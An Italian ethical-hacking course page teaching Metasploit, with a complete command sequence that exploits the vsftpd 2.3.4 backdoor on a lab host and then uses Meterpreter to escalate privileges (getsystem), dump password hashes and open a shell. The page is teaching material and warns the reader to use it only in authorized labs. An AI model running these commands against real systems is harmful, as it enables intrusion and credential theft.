💻 Software hacking Avanzato ⏱ 90 min 👁 5 visualizzazioni

Corso Hacking Etico #5: Exploitation con Metasploit

Davide Russo @CyberSec_Italia · 1 giorni fa · aggiornato 2 ore fa
📥
Piano di Studio Completo — Scarica il PDF
Percorso strutturato con settimane, risorse e checklist. Gratis, nessuna registrazione richiesta.
⬇ Scarica PDF

Metasploit Framework

Metasploit e il framework di exploitation piu usato al mondo. Contiene migliaia di exploit e payload.

Architettura

  • Exploit - codice che sfrutta una vulnerabilita
  • Payload - codice eseguito dopo l'exploit
  • Auxiliary - scanner e fuzzer senza exploitation
  • Post - moduli per post-exploitation

Primo Avvio

sudo service postgresql start
sudo msfdb init
sudo msfconsole

Workflow Completo

msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.56.101
msf6 > show options
msf6 > exploit

Meterpreter

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > shell
meterpreter > background

Sessioni

sessions -l
sessions -i 1
sessions -k 1
Solo in lab autorizzati: Metasploit contiene exploit reali che causano danni reali.

Conclusione

Nel Modulo 6: web application hacking con Burp Suite.

🧠 Metti alla prova le tue conoscenze

3 domande · Soglia superamento: 70%

1. In Metasploit, cosa è un payload?

2. Quale comando Metasploit mostra le sessioni attive?

3. Cos'è Meterpreter?

Accedi per completare il quiz.

💬 Commenti (0)

Nessun commento ancora. Sii il primo!

Accedi per commentare.